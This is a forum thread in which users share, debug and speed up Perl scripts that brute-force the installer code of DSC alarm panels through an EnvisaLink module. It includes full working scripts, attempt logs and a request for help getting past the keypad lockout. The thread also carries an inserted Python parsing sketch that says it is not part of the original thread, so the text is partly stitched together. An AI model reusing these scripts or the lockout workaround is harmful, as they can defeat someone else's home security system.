EVL 4, DSC and lost installer code - hacking my own system


edirol
Posts: 3
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by edirol »

I took a look at the debug logs. The script is getting multi-line responses when there should only be one response per line. So for example in mJack's debug, it's expecting "9229D\r\n", but getting "51080FE\r\n8411CE\r\n9229D\r\n". 922 is the response code to tell the script that it should attempt an installer code.

Two options:
#1
The logs indicate trouble codes/LEDs being active. You can try to clear those trouble codes and then try the script again. It's possible having trouble codes causes the DSC system to return multiple codes at a time.

#2
Adjust the script to try to interpret the responses as containing multi-lines.

Look for the following lines:
while ($r =~ /^922/) {
if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
unless ($response =~ /$wanted/) { goto X; }

Replace with:
while ($r =~ /^922/m) {
if ($r =~ /^680/m) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
unless ($response =~ /$wanted/m) { goto X; }

Thanks,
- Edirol
mJack wrote: Hi there,

I am currently trying the perl script but it seems that I am in a loop. I also do not have any logs created in the txt file and I do not see any code attempt (I tried yesterday for hours and it's identical to the sample below).

EVL3
DSC PC1616

Device:folder users$ perl -w dsc.pl
Name "main::t" used only once: possible typo at dsc.pl line 54.
[20200918_125615] DEBUG: Connected to EnvisaLink
[20200918_125615] response: '5053CD\r\n' (length 8)
[20200918_125615] sent data '005user54\r\n' (length 11)
[20200918_125615] response: '5000052A\r\n5051CB\r\n' (length 18)
[20200918_125615] DEBUG: Correct EnvisaLink password
[20200918_125615] DEBUG: Start installer mode entry cycle
[20200918_125615] sent data '0711*82B\r\n' (length 10)
[20200918_125615] response: '5000712D\r\n' (length 10)
[20200918_125616] response: '51080FE\r\n8411CE\r\n9229D\r\n' (length 24)
[20200918_125644] response: '5109100\r\n6501CC\r\n8401CD\r\n' (length 25)
[20200918_125649] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_125649] response: '51080FE\r\n' (length 9)
[20200918_125650] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
[20200918_130059] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130100] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130452] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_130457] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_130509] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130510] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130624] response: '60900433\r\n6531CF\r\n' (length 18)
[20200918_130627] response: '6100042B\r\n' (length 10)
[20200918_130628] response: '6501CC\r\n' (length 8)
[20200918_130919] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130920] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_131044] response: '60900130\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131139] response: '61000128\r\n5109100\r\n6501CC\r\n' (length 27)
[20200918_131155] response: '60900332\r\n' (length 10)
[20200918_131156] response: '6531CF\r\n' (length 8)
[20200918_131200] response: '6100032A\r\n' (length 10)
[20200918_131200] response: '6501CC\r\n' (length 8)
[20200918_131221] response: '60900231\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131329] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131330] response: '51080FE\r\n51100F7\r\n51090FF\r\n6511CD\r\n' (length 35)
[20200918_131545] response: '60900332\r\n' (length 10)
[20200918_131546] response: '61000229\r\n5109100\r\n6531CF\r\n' (length 27)
[20200918_131550] response: '6100032A\r\n' (length 10)
[20200918_131550] response: '6501CC\r\n' (length 8)
[20200918_131739] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131740] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_132007] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_132011] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_132150] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_132150] response: '51080FE\r\n' (length 9)
[20200918_132150] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
...

any idea?

Much appreciated.
thanks!
Mike
Wicky wrote: Hi Edirol,

Thanks for your code. I am trying yours now on my DSC 5010, Envisalink 4, Pi Raspbian. Two days now, still running, no luck. How do I know the current progress from the screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky
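The multi-frame responses discussed in edirol's reply above, as an added example that is not part of the original thread or the Perl script: a Python sketch that splits one receive buffer into CRLF-terminated frames, validates each frame with the same checksum the script's DSC_cs computes, and shows why an anchored `^922` only matches a later frame when the multi-line flag is set. Function names are assumptions, and the code table holds only meanings stated in this thread.

```python
import re

# Meanings limited to those stated in this thread; other codes stay "unknown".
TPI_CODES = {
    "500": "command acknowledge",
    "609": "zone open",
    "610": "zone restored",
    "650": "partition ready",
    "653": "partition ready, force arming enabled",
    "658": "keypad lockout",
    "670": "invalid access code",
    "680": "system is in installer mode",
    "922": "installer code required",
}


def tpi_checksum(body):
    """Same sum as the script's DSC_cs: ASCII values added, low byte, two hex digits."""
    return "%02X" % (sum(ord(c) for c in body) & 0xFF)


def split_frames(buffer):
    """Split one recv() buffer into CRLF-terminated frames.

    Returns (frames, remainder). The remainder is an unterminated tail that
    belongs in front of the next recv(), since TCP keeps no frame boundaries.
    """
    *complete, remainder = buffer.split("\r\n")
    frames = []
    for raw in complete:
        body, cks = raw[:-2], raw[-2:]
        # A frame needs a 3-digit code plus a 2-character checksum.
        ok = len(raw) >= 5 and body[:3].isdigit() and tpi_checksum(body) == cks.upper()
        frames.append({
            "raw": raw, "code": body[:3], "data": body[3:], "valid": ok,
            "meaning": TPI_CODES.get(body[:3], "unknown"),
        })
    return frames, remainder


def has_code(frames, code):
    """True if any checksum-valid frame carries the given command code."""
    return any(f["valid"] and f["code"] == code for f in frames)


def anchored_match(buffer, code, multiline):
    """Mirror of the Perl test /^CODE/ (multiline=False) versus /^CODE/m (True)."""
    flags = re.MULTILINE if multiline else 0
    return re.search("^" + re.escape(code), buffer, flags) is not None


# Response taken from mJack's debug output quoted above.
MJACK_RESPONSE = "51080FE\r\n8411CE\r\n9229D\r\n"
# Constructed inputs: a frame cut off mid-stream, and one with a wrong checksum.
PARTIAL = "6501CC\r\n922"
CORRUPT = "9229E\r\n"

if __name__ == "__main__":
    frames, rest = split_frames(MJACK_RESPONSE)
    for f in frames:
        print(f["raw"], f["code"], repr(f["data"]), f["valid"], f["meaning"])
    print("^922 without /m:", anchored_match(MJACK_RESPONSE, "922", False))
    print("^922 with /m:   ", anchored_match(MJACK_RESPONSE, "922", True))
    print("partial tail:   ", repr(split_frames(PARTIAL)[1]))
    print("corrupt valid?: ", split_frames(CORRUPT)[0][0]["valid"])
```

Matching on parsed, checksum-valid frames (`has_code`) avoids both the first-line-only problem and false hits on a truncated or corrupted frame.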
bmwhd
Posts: 1
Joined: Sun Jan 03, 2021 1:21 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by bmwhd »

Running the script now on my DSC 1832. Seems to be running ok using Strawberry on my PC. It has hung a couple of times but I restart at the next code and it goes on again for a while. We'll see.

Edit: Script seems to be working but hangs after 20-30 attempts and has to be restarted. I just edit the script to start at the last number before it hangs.

Final update: Successful! Script finally started running without getting stuck. FWIW it was doing 240 attempts an hour on average using an old laptop. Thanks for this!
PDub65
Posts: 1
Joined: Wed Jan 06, 2021 11:38 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by PDub65 »

The script worked for me on a DSC Power Series 832. I was getting about 600 guesses per hour from a Linux VM.

If you are getting the following error, make sure you have no other connections to the EnvisaLink on port 4025. My home automation server was also connecting to port 4025.

connected
response: '' (length 0)
send: Cannot determine peer address at alarm.pl line 115.
retiree_caf
Posts: 1
Joined: Wed Mar 12, 2014 8:55 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by retiree_caf »

I have tried the script using Perl for iOS for a DSC182 and I keep getting the “network is unreachable” error.

Can anyone help explain why it can't connect to the EVL4? I have the right IP and password keyed in the source code variable...

Thanks for the help.
Renton
Posts: 1
Joined: Fri Mar 12, 2021 12:36 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Renton »

edirol wrote:Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:


#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink 
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------"; 

# This is your EnvisaLink password.  The default is user if you haven't changed it. 
$password = "user";

# Range which you want to test 
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print 
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922 
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode 

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code  

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values 
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command 
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response 
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....


I'm working with an 1835 panel that has the keypad lockout enabled, so after 30 incorrect codes in a row it locks the keyboard for an indeterminable amount of time - maybe 10-15 minutes or so. The script will just hang after the 30 attempts because it never receives the 922 after getting the 658 - keyboard lockout response.

I have 2 ideas for a potential tweak to the script. I do have a working Master Code, and I can arm/disarm the system with the master code which resets the failed code count.

Can someone help rework this script to include some logic to arm/disarm the system via a Master Code every 30th attempt before trying the installer again?

Either that or introducing a 10 minute wait every 30 attempts - but that will make the whole process longer!

Appreciate any suggestions/help.
baobao
Posts: 1
Joined: Thu Jul 22, 2021 5:20 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by baobao »

I made a few changes; the scanning speed is now about 22~24/min.

#!/usr/bin/perl
#http://forum.eyez-on.com/FORUM/viewtopi ... 9&start=30
#https://www.reddit.com/r/homeassistant/ ... ller_code/

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "192.168.1.XXX";

# This is your EnvisaLink password. The default is user if you haven't changed it.
$password = "user";

# Range which you want to test
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password)); # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
   # DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
   $r = DSC_get_ww("^922|^6[58]");
   while (index($r, "922") == -1) {
      l0gt("There is an exception: '$r'"); # retry
      DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
      DSC_get_w();
      sleep(0.6);
      l0gt("fuck up DEBUG: Start installer mode entry cycle");
      DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
      # DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
      $r = DSC_get_ww("^922|^6[58]");
   }
   l0gt("got 922");
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode)); # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code

   # sleep(1.5);
   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG 2nd try: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^670|^6[58]"); #look for retry or ready or installer mode code
      #If your system is like mine and only allows one retry,
      #accept 670 as a response here, add a 0.6s sleep, and comment out the loop.
      #this way it doesn't wait for the system to timeout and forces it to go back to the main menu.
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6); # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w { # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww { # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
mcoad01
Posts: 1
Joined: Thu Nov 25, 2021 8:43 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mcoad01 »

Script worked! DSC PC5020 v3.24 Thanks!!!!
iambdud
Posts: 3
Joined: Mon Dec 27, 2021 12:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by iambdud »

Another +1 for the script working. DSC 1616 Thanks!!!
alt0idman
Posts: 1
Joined: Tue Jan 18, 2022 11:53 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by alt0idman »

Thanks to all for the various iterations of scripts first of all!

I have an EVL3, DSC 1864, not installer locked (no multiple clicks on first power up). I have Loss of System Time after disconnecting AC power + battery power during EVL3 install. I also have error code 4 for failure to communicate (GSM service disconnected). I don't have the installer code of course, and no master code either, just user codes.

The problem I have is that I've never seen a 922 response from my system ever, after sending the 0711*8 command. Just receive the 500 command ack response and usual zone messages. Waited for 5+ minutes.

Tried the following troubleshooting:
(1) Switched from 071 to the 070 individual keystroke approach but no change
(2) Tried different master code commands like *6 to change the time (hoping for master code 921 code)
(3) Reset power (AC + Battery) and tried on a clean started system
(4) Added the description of the codes to the script to decode each code as it comes in (eg Command ACK, Partition Ready...)


[20220121_003633] DEBUG: Connected to EnvisaLink
[20220121_003633] response: '5053CD\r\n' (length 8)
[20220121_003633] sent data '005user54\r\n' (length 11)
[20220121_003633] response: '5000052A\r\n5051CB\r\n' (length 18)
[20220121_003633] DEBUG: Correct EnvisaLink password
[20220121_003633] DEBUG: Start installer mode entry cycle with code 0000
[20220121_003633] sent data '0711*82B\r\n' (length 10)
[20220121_003633] response: '5000712D\r\n' (length 10)
[20220121_003633] Command ACK
[20220121_003644] response: '60901232\r\n6531CF\r\n' (length 18)
[20220121_003644] Zone Open
[20220121_003644] Parition Ready Force Arming Enabled
[20220121_003646] response: '6100122A\r\n' (length 10)
[20220121_003646] Zone Restored
[20220121_003646] response: '6501CC\r\n' (length 8)
[20220121_003646] Parition Ready
[20220121_003647] response: '60901232\r\n6531CF\r\n' (length 18)
[20220121_003647] Zone Open
[20220121_003647] Parition Ready Force Arming Enabled
[20220121_003648] response: '6100122A\r\n6501CC\r\n' (length 18)
[20220121_003648] Zone Restored
[20220121_003648] Parition Ready

Any ideas?
Last edited by alt0idman on Fri Jan 21, 2022 1:50 am, edited 1 time in total.
homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by homediy »

Thanks for the script. Login was successful but the response coming back doesn't look right.

It's just waiting for a response and doesn't progress, nor does it terminate. Here's my output. Any ideas why it's stuck at response code "65211FF"?


[20220120_195156] DEBUG: Connected to EnvisaLink
[20220120_195156] response: '5053CD\r\n' (length 8)
[20220120_195156] sent data '005user54\r\n' (length 11)
[20220120_195156] response: '5000052A\r\n5051CB\r\n' (length 18)
[20220120_195156] DEBUG: Correct EnvisaLink password
[20220120_195156] DEBUG: Start installer mode entry cycle
[20220120_195156] sent data '0711*82B\r\n' (length 10)
[20220120_195156] response: '5000712D\r\n' (length 10)
[20220120_195157] response: '51080FE\r\n' (length 9)
[20220120_195157] response: '5108A0F\r\n' (length 9)
[20220120_195157] response: '6711CF\r\n' (length 8)
[20220120_195200] response: '65211FF\r\n' (length 9)
It hasn't even started ATTEMPT 0000 yet.